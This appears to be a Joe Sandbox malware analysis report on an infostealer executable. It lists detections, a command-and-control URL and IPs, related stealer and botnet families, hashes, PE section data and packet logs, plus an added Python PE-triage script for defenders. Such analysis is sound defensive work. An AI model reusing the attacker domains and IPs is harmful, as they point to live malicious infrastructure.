Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop

Source | Detection | Scanner | Label
CMpuGis28l.exe | 37% | ReversingLabs | Win32.Infostealer.Tinba
CMpuGis28l.exe | 100% | Avira | TR/Crypt.TPM.Gen
CMpuGis28l.exe | 100% | Joe Sandbox ML |
No Antivirus matches (four further antivirus tables, all empty)
Name | IP | Active | Malicious | Antivirus Detection | Reputation
home.fivetk5ht.top | 185.121.15.192 | true | false | | high
httpbin.org | 98.85.100.80 | true | false | | high

Name | Malicious | Antivirus Detection | Reputation
http://home.fivetk5ht.top/zldPRFrmVFHTtKntGpOv1734579851 | true | | unknown
https://httpbin.org/ip | false | | high

Name | Source | Malicious | Antivirus Detection | Reputation
https://curl.se/docs/hsts.html | CMpuGis28l.exe, 00000000.00000003.2440902371.0000000007A16000.00000004.00001000.00020000.00000000.sdmp | false | | high
http://html4/loose.dtd | CMpuGis28l.exe, 00000000.00000002.2531201882.000000000154D000.00000040.00000001.01000000.00000003.sdmp, CMpuGis28l.exe, 00000000.00000003.2440902371.0000000007A16000.00000004.00001000.00020000.00000000.sdmp | false | | high
http://home.fivetk5ht.top/zldPRFrmVFHTtKntGpOv1734579851S~ | CMpuGis28l.exe, 00000000.00000002.2532130951.0000000001C6E000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://home.fivetk5ht.top/zldPRFrmVFHTtKntGpOv1734579851http://home.fivetk5ht.top/zldPRFrmVFHTtKntGp | CMpuGis28l.exe, 00000000.00000002.2531201882.000000000154D000.00000040.00000001.01000000.00000003.sdmp | false | | unknown
https://httpbin.org/ipbefore | CMpuGis28l.exe, 00000000.00000002.2531201882.000000000154D000.00000040.00000001.01000000.00000003.sdmp, CMpuGis28l.exe, 00000000.00000003.2440902371.0000000007A16000.00000004.00001000.00020000.00000000.sdmp | false | | high
https://curl.se/docs/http-cookies.html | CMpuGis28l.exe, CMpuGis28l.exe, 00000000.00000002.2531201882.000000000154D000.00000040.00000001.01000000.00000003.sdmp, CMpuGis28l.exe, 00000000.00000003.2440902371.0000000007A16000.00000004.00001000.00020000.00000000.sdmp | false | | high
http://home.fivetk5ht.top/zldPRFrmVFHTtKntGpOv173457985135a1 | CMpuGis28l.exe, 00000000.00000002.2532130951.0000000001C6E000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://curl.se/docs/hsts.html# | CMpuGis28l.exe | false | | high
http://home.fivetk5ht.top/zldPRFrmVFHTtKntGpOv17 | CMpuGis28l.exe, 00000000.00000003.2440902371.0000000007A16000.00000004.00001000.00020000.00000000.sdmp | false | | unknown
https://curl.se/docs/alt-svc.html | CMpuGis28l.exe, 00000000.00000003.2440902371.0000000007A16000.00000004.00001000.00020000.00000000.sdmp | false | | high
http://.css | CMpuGis28l.exe, 00000000.00000002.2531201882.000000000154D000.00000040.00000001.01000000.00000003.sdmp, CMpuGis28l.exe, 00000000.00000003.2440902371.0000000007A16000.00000004.00001000.00020000.00000000.sdmp | false | | high
http://.jpg | CMpuGis28l.exe, 00000000.00000002.2531201882.000000000154D000.00000040.00000001.01000000.00000003.sdmp, CMpuGis28l.exe, 00000000.00000003.2440902371.0000000007A16000.00000004.00001000.00020000.00000000.sdmp | false | | high
IP | Domain | Country | ASN | ASN Name | Malicious
185.121.15.192 | home.fivetk5ht.top | Spain | 207046 | REDSERVICIOES | false
98.85.100.80 | httpbin.org | United States | 11351 | TWC-11351-NORTHEASTUS | false
Joe Sandbox version:41.0.0 Charoite
Analysis ID:1578895
Start date and time:2024-12-20 16:19:00 +01:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 6m 10s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:default.jbs
Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed:5
Number of new started drivers analysed:0
Number of existing processes analysed:0
Number of existing drivers analysed:0
Number of injected processes analysed:0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode:default
Analysis stop reason:Timeout
Sample name:CMpuGis28l.exe
renamed because original name is a hash value
Original Sample Name:b6aa4b3886f2272b307df8dee7426a4f.exe
Detection:MAL
Classification:mal100.troj.spyw.evad.winEXE@1/0@6/2
EGA Information:
• Successful, ratio: 100%
HCA Information:Failed
Cookbook Comments:
• Found application associated with file extension: .exe
• Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
• Excluded IPs from analysis (whitelisted): 20.12.23.50, 172.202.163.200, 13.107.246.63
• Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
• VT rate limit hit for: CMpuGis28l.exe
Time | Type | Description
10:20:14 | API Interceptor | 3x Sleep call for process: CMpuGis28l.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name | Context
185.121.15.192 | 5Jat5RkD3a.exe | malicious | Unknown | home.twentytk20ht.top/TQIuuaqjNpwYjtUvFojm1734579850
185.121.15.192 | u57m8aCdwb.exe | malicious | Unknown | home.twentytk20ht.top/TQIuuaqjNpwYjtUvFojm1734579850
185.121.15.192 | TnIhoWAr57.exe | malicious | Clipboard Hijacker, Cryptbot | home.twentytk20ht.top/TQIuuaqjNpwYjtUvFojm1734579850
185.121.15.192 | file.exe | malicious | LummaC, Amadey, LummaC Stealer, PureLog Stealer, zgRAT | home.fivetk5ht.top/zldPRFrmVFHTtKntGpOv1734579851?argument=TmUWwkAQBKXXTWTE1734696758
98.85.100.80 | u57m8aCdwb.exe | malicious | Unknown |
98.85.100.80 | TnIhoWAr57.exe | malicious | Clipboard Hijacker, Cryptbot |
98.85.100.80 | file.exe | malicious | LummaC, Amadey, LummaC Stealer, PureLog Stealer, zgRAT |
98.85.100.80 | file.exe | malicious | LummaC, Amadey, LummaC Stealer |
98.85.100.80 | file.exe | malicious | ScreenConnect Tool, LummaC, Amadey, Cryptbot, LummaC Stealer, Vidar |
98.85.100.80 | Tii6ue74NB.exe | malicious | LummaC, Amadey, Cryptbot, LummaC Stealer, RHADAMANTHYS, Stealc, Vidar |
98.85.100.80 | file.exe | malicious | LummaC, Amadey, Cryptbot, LummaC Stealer, RHADAMANTHYS |
98.85.100.80 | file.exe | malicious | LummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, Xmrig |
98.85.100.80 | SwJD3kiOwV.exe | malicious | Clipboard Hijacker, Cryptbot |
98.85.100.80 | 8dw8GAvqmM.exe | malicious | Clipboard Hijacker, Cryptbot |

Match | Associated Sample Name / URL | Detection | Threat Name | Context
home.fivetk5ht.top | file.exe | malicious | LummaC, Amadey, LummaC Stealer, PureLog Stealer, zgRAT | 185.121.15.192
home.fivetk5ht.top | file.exe | malicious | LummaC, Amadey, LummaC Stealer, PureLog Stealer, zgRAT | 185.121.15.192
httpbin.org | 5Jat5RkD3a.exe | malicious | Unknown | 34.226.108.155
httpbin.org | u57m8aCdwb.exe | malicious | Unknown | 98.85.100.80
httpbin.org | TnIhoWAr57.exe | malicious | Clipboard Hijacker, Cryptbot | 98.85.100.80
httpbin.org | file.exe | malicious | LummaC, Amadey, LummaC Stealer, PureLog Stealer, zgRAT | 34.226.108.155
httpbin.org | file.exe | malicious | LummaC, Amadey, LummaC Stealer, PureLog Stealer, zgRAT | 98.85.100.80
httpbin.org | file.exe | malicious | LummaC, Amadey, Cryptbot, LummaC Stealer | 34.226.108.155
httpbin.org | file.exe | malicious | LummaC, Amadey, LummaC Stealer | 98.85.100.80
httpbin.org | file.exe | malicious | LummaC, Amadey, Cryptbot, LummaC Stealer | 34.226.108.155
httpbin.org | file.exe | malicious | NetSupport RAT, LummaC, Amadey, LummaC Stealer | 34.226.108.155
httpbin.org | file.exe | malicious | ScreenConnect Tool, LummaC, Amadey, Cryptbot, LummaC Stealer, Vidar | 98.85.100.80

Match | Associated Sample Name / URL | Detection | Threat Name | Context
TWC-11351-NORTHEASTUS | u57m8aCdwb.exe | malicious | Unknown | 98.85.100.80
TWC-11351-NORTHEASTUS | TnIhoWAr57.exe | malicious | Clipboard Hijacker, Cryptbot | 98.85.100.80
TWC-11351-NORTHEASTUS | arm5.elf | malicious | Mirai | 72.226.210.219
TWC-11351-NORTHEASTUS | hmips.elf | malicious | Mirai | 45.46.119.24
TWC-11351-NORTHEASTUS | file.exe | malicious | LummaC, Amadey, LummaC Stealer, PureLog Stealer, zgRAT | 98.85.100.80
TWC-11351-NORTHEASTUS | file.exe | malicious | LummaC, Amadey, LummaC Stealer | 98.85.100.80
TWC-11351-NORTHEASTUS | la.bot.powerpc.elf | malicious | Mirai | 67.252.15.48
TWC-11351-NORTHEASTUS | la.bot.sparc.elf | malicious | Mirai | 98.94.131.188
TWC-11351-NORTHEASTUS | file.exe | malicious | ScreenConnect Tool, LummaC, Amadey, Cryptbot, LummaC Stealer, Vidar | 98.85.100.80
TWC-11351-NORTHEASTUS | arm.nn.elf | malicious | Mirai, Okiru | 50.75.56.140
REDSERVICIOES | 5Jat5RkD3a.exe | malicious | Unknown | 185.121.15.192
REDSERVICIOES | u57m8aCdwb.exe | malicious | Unknown | 185.121.15.192
REDSERVICIOES | TnIhoWAr57.exe | malicious | Clipboard Hijacker, Cryptbot | 185.121.15.192
REDSERVICIOES | file.exe | malicious | LummaC, Amadey, LummaC Stealer, PureLog Stealer, zgRAT | 185.121.15.192
REDSERVICIOES | http://blacksaltys.com | malicious | Unknown | 185.121.15.137
REDSERVICIOES | IGz.arm7.elf | malicious | Mirai | 185.189.98.142
REDSERVICIOES | https://agradeahead.com/ | malicious | Unknown | 185.121.15.137
REDSERVICIOES | http://productfocus.com | malicious | Unknown | 185.121.15.137
REDSERVICIOES | https://objmapper.com/CtmE0s2ZteC8BuQLNprxjCPB8gAgAcIi7niu-9oX3Q2e | malicious | Unknown | 185.121.15.137
REDSERVICIOES | hax.mips.elf | malicious | Mirai | 185.226.106.144
No context (two further context tables, both empty)
No created / dropped files found
File type:PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
Entropy (8bit):7.982722793916352
TrID:
• Win32 Executable (generic) a (10002005/4) 99.96%
• Generic Win/DOS Executable (2004/3) 0.02%
• DOS Executable Generic (2002/1) 0.02%
• VXD Driver (31/22) 0.00%
• Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:CMpuGis28l.exe
File size:4'480'512 bytes
MD5:b6aa4b3886f2272b307df8dee7426a4f
SHA1:8c80da0f5e93622c881e82693715cc81927684fe
SHA256:b571064c090d5a6b22aecf6df5a534bf2481c0d77962369c6c4fb1500c1ad47e
SHA512:9c9f34423eb5498b5d26a9f34cb104b8f1404f76a060bc549a7a7fcd4ae7608a7f22e1c859db652331cab426453c17be093af0959bf8a7b50e72ad28ebfdbc96
SSDEEP:98304:5R5O5EL5UyXsVwLEKx8pUcNEExPX1eGBqUoWWeTKWcXcouisWn/dPCvQ:5REElBwwoCb6vlFjcWWqKZsouiRnVsQ
TLSH:A4263314CD06F9CBE66D4E71102FC9A2E1896A296B30A53F3F110BB3B7951AC3F2655C
File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....cg...............(.VH...v..2...0.......pH...@..........................`.......pD...@... ............................
Icon Hash:00928e8e8686b000
Entrypoint:0x1093000
Entrypoint Section:.taggant
Digitally signed:false
Imagebase:0x400000
Subsystem:windows gui
Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
DLL Characteristics:DYNAMIC_BASE
Time Stamp:0x67639809 [Thu Dec 19 03:50:33 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:4
OS Version Minor:0
File Version Major:4
File Version Minor:0
Subsystem Version Major:4
Subsystem Version Minor:0
Import Hash:2eabe9054cad5152567f0699947a2c5b
Instruction
jmp 00007F93352675BAh
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x74705f | 0x73 | .idata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x746000 | 0x1ac | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xc912d8 | 0x10 | bxszsxlr
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0xc91288 | 0x18 | bxszsxlr
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
(empty) | 0x1000 | 0x745000 | 0x284c00 | f2d3fe9da2d6f27beb72dce24e18638a | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x746000 | 0x1ac | 0x200 | d58bc69069b0f0bc03e1122aab56cc7e | False | 0.580078125 | data | 4.508390843970673 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata | 0x747000 | 0x1000 | 0x200 | e84636d45557e74dadd0f14f36394655 | False | 0.166015625 | data | 1.1471680400846989 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
(empty) | 0x748000 | 0x38c000 | 0x200 | 093f2894dd0f87fa65a36a1772298df1 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
bxszsxlr | 0xad4000 | 0x1be000 | 0x1bd600 | e56d3713374e54676c3c56ad10c21dce | False | 0.9944245763752456 | data | 7.955545656668972 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
ezgbzeah | 0xc92000 | 0x1000 | 0x400 | 1c3dcabe5621d402910e7917a894438e | False | 0.84375 | data | 6.317720902507682 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.taggant | 0xc93000 | 0x3000 | 0x2200 | 15c8f5a52edc1ae26c59efc924047666 | False | 0.072265625 | DOS executable (COM) | 0.7981673405576435 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_MANIFEST | 0xc912e8 | 0x152 | ASCII text, with CRLF line terminators | | | 0.6479289940828402
DLL | Import
kernel32.dll | lstrcpy
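The section table above is what the static signatures in this report key on: the entry point 0x1093000 (RVA 0xc93000 against image base 0x400000) lies in the non-standard .taggant section, every executable section is also writable, two sections carry empty names, bxszsxlr has an entropy of 7.96 bits per byte, and the whole import table is a single lstrcpy from kernel32.dll. The script below is an added example and not part of the Joe Sandbox report: it reproduces those checks from the raw PE headers using only the Python standard library. Because it has to run offline, it also constructs its own three-section PE32 fixture; the fixture's section names, bytes and the 7.0-bit entropy threshold are assumptions for the demonstration, not data taken from the sample.

```python
import math
import random
import re
import struct
import sys

# Section characteristic bits (winnt.h names).
IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_READ = 0x40000000
IMAGE_SCN_MEM_WRITE = 0x80000000
RWX = IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE

# Allowlist of conventional section names (assumption: a small common set, extend as needed).
STANDARD_SECTIONS = {".text", ".data", ".rdata", ".bss", ".idata", ".edata", ".rsrc",
                     ".reloc", ".tls", ".pdata", ".CRT", ".textbss"}
NAME_OK = re.compile(r"[A-Za-z0-9_.$]+", re.ASCII)   # empty or odd-character names fail this


def shannon_entropy(data: bytes) -> float:
    """8-bit Shannon entropy in bits per byte, 0.0 for empty input, 8.0 for uniform bytes."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def analyze_pe(pe: bytes, entropy_threshold: float = 7.0) -> dict:
    """Walk DOS header -> PE signature -> COFF header -> optional header -> section table."""
    if pe[:2] != b"MZ":
        raise ValueError("no MZ header")
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("no PE signature")
    coff = e_lfanew + 4
    _, nsec, _, _, _, opt_size, _ = struct.unpack_from("<HHIIIHH", pe, coff)
    opt = coff + 20
    entry_rva = struct.unpack_from("<I", pe, opt + 16)[0]        # AddressOfEntryPoint
    sections = []
    for i in range(nsec):                                         # 40-byte IMAGE_SECTION_HEADERs
        raw_name, vsize, va, raw_size, raw_ptr, _, _, _, _, flags = struct.unpack_from(
            "<8sIIIIIIHHI", pe, opt + opt_size + 40 * i)
        sections.append({"name": raw_name.rstrip(b"\0").decode("latin-1"), "va": va,
                         "vsize": vsize, "raw_size": raw_size, "flags": flags,
                         "entropy": round(shannon_entropy(pe[raw_ptr:raw_ptr + raw_size]), 3)})

    def holds(s, rva):   # a section covers [VA, VA + max(VirtualSize, SizeOfRawData))
        return s["va"] <= rva < s["va"] + max(s["vsize"], s["raw_size"])

    entry = next((s["name"] for s in sections if holds(s, entry_rva)), None)
    return {
        "entry_rva": entry_rva,
        "entry_section": entry,
        "entry_outside_standard": entry not in STANDARD_SECTIONS,
        "rwx_sections": [s["name"] for s in sections if s["flags"] & RWX == RWX],
        "nonstandard_names": [s["name"] for s in sections if s["name"] not in STANDARD_SECTIONS],
        "special_char_names": [s["name"] for s in sections if not NAME_OK.fullmatch(s["name"])],
        "high_entropy_sections": [s["name"] for s in sections if s["entropy"] >= entropy_threshold],
        "sections": sections,
    }


def _align(n: int, a: int) -> int:
    return (n + a - 1) // a * a


def build_sample_pe(seed: int = 7) -> bytes:
    """Constructed PE32 fixture (not the analysed sample): three sections, entry point in the last."""
    rng = random.Random(seed)
    packed = bytes(rng.getrandbits(8) for _ in range(0x1000))   # stands in for a packed payload
    payloads = [  # (name, raw data, characteristics)
        (b".text", b"\x55\x8b\xec" + b"\x90" * 0x100 + b"\xc3", 0x60000020),   # CODE | R | X
        (b"bxszsxlr", packed, 0xE0000040),                                     # INIT_DATA | R | W | X
        (b".taggant", b"\xe9" + b"\x00" * 0x3F, 0xE0000040),                   # unpacking stub, R | W | X
    ]
    file_align, sect_align, opt_size = 0x200, 0x1000, 0xE0
    size_of_headers = _align(0x40 + 4 + 20 + opt_size + 40 * len(payloads), file_align)
    raw_ptr, va, sec_hdrs, body, vas = size_of_headers, sect_align, b"", b"", []
    for name, data, flags in payloads:
        raw_size = _align(len(data), file_align)
        sec_hdrs += struct.pack("<8sIIIIIIHHI", name.ljust(8, b"\0"), len(data), va,
                                raw_size, raw_ptr, 0, 0, 0, 0, flags)
        body += data.ljust(raw_size, b"\0")
        vas.append(va)
        raw_ptr += raw_size
        va += _align(len(data), sect_align)
    hdr = bytearray(size_of_headers)
    hdr[0:2] = b"MZ"
    struct.pack_into("<I", hdr, 0x3C, 0x40)                         # e_lfanew
    hdr[0x40:0x44] = b"PE\0\0"
    struct.pack_into("<HHIIIHH", hdr, 0x44, 0x14C, len(payloads), 0, 0, 0, opt_size, 0x0102)
    opt = 0x58
    struct.pack_into("<H", hdr, opt, 0x10B)                         # PE32 magic
    struct.pack_into("<I", hdr, opt + 16, vas[-1])                  # entry point -> .taggant
    struct.pack_into("<I", hdr, opt + 28, 0x400000)                 # ImageBase
    struct.pack_into("<II", hdr, opt + 32, sect_align, file_align)
    struct.pack_into("<II", hdr, opt + 56, va, size_of_headers)     # SizeOfImage, SizeOfHeaders
    struct.pack_into("<H", hdr, opt + 68, 2)                        # IMAGE_SUBSYSTEM_WINDOWS_GUI
    struct.pack_into("<I", hdr, opt + 92, 16)                       # NumberOfRvaAndSizes
    hdr[opt + opt_size:opt + opt_size + len(sec_hdrs)] = sec_hdrs
    return bytes(hdr) + body


if __name__ == "__main__":
    blob = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else build_sample_pe()
    report = analyze_pe(blob)
    for key, value in report.items():
        if key != "sections":
            print(f"{key}: {value}")
    for s in report["sections"]:
        print(f"  {s['name']!r:12} va={s['va']:#09x} raw={s['raw_size']:#07x} "
              f"entropy={s['entropy']:.2f} flags={s['flags']:#010x}")
```

Run it with a file path to triage a real binary, or with no arguments to see the checks fire on the fixture. The entropy is computed over SizeOfRawData bytes, which is why the report shows "unknown" for the two unnamed sections: their raw sizes do not match the file, so there is nothing meaningful to measure, and that mismatch is itself a packer artefact.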
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 20, 2024 16:20:09.715339899 CET | 49710 | 443 | 192.168.2.12 | 98.85.100.80
Dec 20, 2024 16:20:09.715388060 CET | 443 | 49710 | 98.85.100.80 | 192.168.2.12
Dec 20, 2024 16:20:09.715500116 CET | 49710 | 443 | 192.168.2.12 | 98.85.100.80
Dec 20, 2024 16:20:09.728126049 CET | 49710 | 443 | 192.168.2.12 | 98.85.100.80
Dec 20, 2024 16:20:09.728141069 CET | 443 | 49710 | 98.85.100.80 | 192.168.2.12
Dec 20, 2024 16:20:11.490542889 CET | 443 | 49710 | 98.85.100.80 | 192.168.2.12
Dec 20, 2024 16:20:11.502178907 CET | 49710 | 443 | 192.168.2.12 | 98.85.100.80
Dec 20, 2024 16:20:11.502202034 CET | 443 | 49710 | 98.85.100.80 | 192.168.2.12
Dec 20, 2024 16:20:11.503734112 CET | 443 | 49710 | 98.85.100.80 | 192.168.2.12
Dec 20, 2024 16:20:11.503823996 CET | 49710 | 443 | 192.168.2.12 | 98.85.100.80
Dec 20, 2024 16:20:11.522634983 CET | 49710 | 443 | 192.168.2.12 | 98.85.100.80
Dec 20, 2024 16:20:11.522773981 CET | 443 | 49710 | 98.85.100.80 | 192.168.2.12
Dec 20, 2024 16:20:11.573157072 CET | 49710 | 443 | 192.168.2.12 | 98.85.100.80
Dec 20, 2024 16:20:11.573184967 CET | 443 | 49710 | 98.85.100.80 | 192.168.2.12
Dec 20, 2024 16:20:11.609195948 CET | 49710 | 443 | 192.168.2.12 | 98.85.100.80
Dec 20, 2024 16:20:11.655339003 CET | 443 | 49710 | 98.85.100.80 | 192.168.2.12
Dec 20, 2024 16:20:11.929086924 CET | 443 | 49710 | 98.85.100.80 | 192.168.2.12
Dec 20, 2024 16:20:11.929760933 CET | 443 | 49710 | 98.85.100.80 | 192.168.2.12
Dec 20, 2024 16:20:11.929863930 CET | 49710 | 443 | 192.168.2.12 | 98.85.100.80
Dec 20, 2024 16:20:11.943106890 CET | 49710 | 443 | 192.168.2.12 | 98.85.100.80
Dec 20, 2024 16:20:11.943119049 CET | 443 | 49710 | 98.85.100.80 | 192.168.2.12
Dec 20, 2024 16:20:13.054404974 CET | 49711 | 80 | 192.168.2.12 | 185.121.15.192
Dec 20, 2024 16:20:13.175223112 CET | 80 | 49711 | 185.121.15.192 | 192.168.2.12
Dec 20, 2024 16:20:13.175528049 CET | 49711 | 80 | 192.168.2.12 | 185.121.15.192
Dec 20, 2024 16:20:13.176632881 CET | 49711 | 80 | 192.168.2.12 | 185.121.15.192
Dec 20, 2024 16:20:13.296612024 CET | 80 | 49711 | 185.121.15.192 | 192.168.2.12
Dec 20, 2024 16:20:13.296782017 CET | 80 | 49711 | 185.121.15.192 | 192.168.2.12
Dec 20, 2024 16:20:13.296792984 CET | 80 | 49711 | 185.121.15.192 | 192.168.2.12
Dec 20, 2024 16:20:13.296833992 CET | 49711 | 80 | 192.168.2.12 | 185.121.15.192
Dec 20, 2024 16:20:13.296895981 CET | 80 | 49711 | 185.121.15.192 | 192.168.2.12
Dec 20, 2024 16:20:13.296910048 CET | 80 | 49711 | 185.121.15.192 | 192.168.2.12
Dec 20, 2024 16:20:13.296919107 CET | 80 | 49711 | 185.121.15.192 | 192.168.2.12
Dec 20, 2024 16:20:13.296952963 CET | 49711 | 80 | 192.168.2.12 | 185.121.15.192
Dec 20, 2024 16:20:13.296973944 CET | 49711 | 80 | 192.168.2.12 | 185.121.15.192
Dec 20, 2024 16:20:13.297247887 CET | 80 | 49711 | 185.121.15.192 | 192.168.2.12
Dec 20, 2024 16:20:13.297259092 CET | 80 | 49711 | 185.121.15.192 | 192.168.2.12
Dec 20, 2024 16:20:13.297270060 CET | 80 | 49711 | 185.121.15.192 | 192.168.2.12
Dec 20, 2024 16:20:13.297281027 CET | 80 | 49711 | 185.121.15.192 | 192.168.2.12
Dec 20, 2024 16:20:13.297326088 CET | 49711 | 80 | 192.168.2.12 | 185.121.15.192
Dec 20, 2024 16:20:13.297348022 CET | 49711 | 80 | 192.168.2.12 | 185.121.15.192
Dec 20, 2024 16:20:13.416520119 CET | 80 | 49711 | 185.121.15.192 | 192.168.2.12
Dec 20, 2024 16:20:13.416601896 CET | 80 | 49711 | 185.121.15.192 | 192.168.2.12
Dec 20, 2024 16:20:13.416692972 CET | 49711 | 80 | 192.168.2.12 | 185.121.15.192
Dec 20, 2024 16:20:13.417190075 CET | 80 | 49711 | 185.121.15.192 | 192.168.2.12
Dec 20, 2024 16:20:13.417201996 CET | 80 | 49711 | 185.121.15.192 | 192.168.2.12
Dec 20, 2024 16:20:13.417212963 CET | 80 | 49711 | 185.121.15.192 | 192.168.2.12
Dec 20, 2024 16:20:13.417223930 CET | 80 | 49711 | 185.121.15.192 | 192.168.2.12
Dec 20, 2024 16:20:13.417248964 CET | 49711 | 80 | 192.168.2.12 | 185.121.15.192
Dec 20, 2024 16:20:13.417380095 CET | 49711 | 80 | 192.168.2.12 | 185.121.15.192
Dec 20, 2024 16:20:13.458101034 CET | 80 | 49711 | 185.121.15.192 | 192.168.2.12
Dec 20, 2024 16:20:13.458772898 CET | 49711 | 80 | 192.168.2.12 | 185.121.15.192
Dec 20, 2024 16:20:13.577945948 CET | 80 | 49711 | 185.121.15.192 | 192.168.2.12
Dec 20, 2024 16:20:13.578219891 CET | 49711 | 80 | 192.168.2.12 | 185.121.15.192
Dec 20, 2024 16:20:13.626032114 CET | 80 | 49711 | 185.121.15.192 | 192.168.2.12
Dec 20, 2024 16:20:13.742352009 CET | 80 | 49711 | 185.121.15.192 | 192.168.2.12
Dec 20, 2024 16:20:13.742599010 CET | 49711 | 80 | 192.168.2.12 | 185.121.15.192
Dec 20, 2024 16:20:13.946860075 CET | 80 | 49711 | 185.121.15.192 | 192.168.2.12
Dec 20, 2024 16:20:13.947124004 CET | 49711 | 80 | 192.168.2.12 | 185.121.15.192
Dec 20, 2024 16:20:14.187297106 CET | 80 | 49711 | 185.121.15.192 | 192.168.2.12
Dec 20, 2024 16:20:14.187673092 CET | 49711 | 80 | 192.168.2.12 | 185.121.15.192
Dec 20, 2024 16:20:14.187741995 CET | 49711 | 80 | 192.168.2.12 | 185.121.15.192
Dec 20, 2024 16:20:14.309518099 CET | 80 | 49711 | 185.121.15.192 | 192.168.2.12
Dec 20, 2024 16:20:14.309534073 CET | 80 | 49711 | 185.121.15.192 | 192.168.2.12
Dec 20, 2024 16:20:14.309551001 CET | 80 | 49711 | 185.121.15.192 | 192.168.2.12
Dec 20, 2024 16:20:14.309561968 CET | 80 | 49711 | 185.121.15.192 | 192.168.2.12
Dec 20, 2024 16:20:14.309572935 CET | 80 | 49711 | 185.121.15.192 | 192.168.2.12
Dec 20, 2024 16:20:14.309581995 CET | 80 | 49711 | 185.121.15.192 | 192.168.2.12
Dec 20, 2024 16:20:14.309592009 CET | 80 | 49711 | 185.121.15.192 | 192.168.2.12
Dec 20, 2024 16:20:14.309602976 CET | 80 | 49711 | 185.121.15.192 | 192.168.2.12
Dec 20, 2024 16:20:14.309613943 CET | 80 | 49711 | 185.121.15.192 | 192.168.2.12
Dec 20, 2024 16:20:14.309623003 CET | 80 | 49711 | 185.121.15.192 | 192.168.2.12
Dec 20, 2024 16:20:14.309633970 CET | 80 | 49711 | 185.121.15.192 | 192.168.2.12
Dec 20, 2024 16:20:14.309643030 CET | 80 | 49711 | 185.121.15.192 | 192.168.2.12
Dec 20, 2024 16:20:14.309654951 CET | 80 | 49711 | 185.121.15.192 | 192.168.2.12
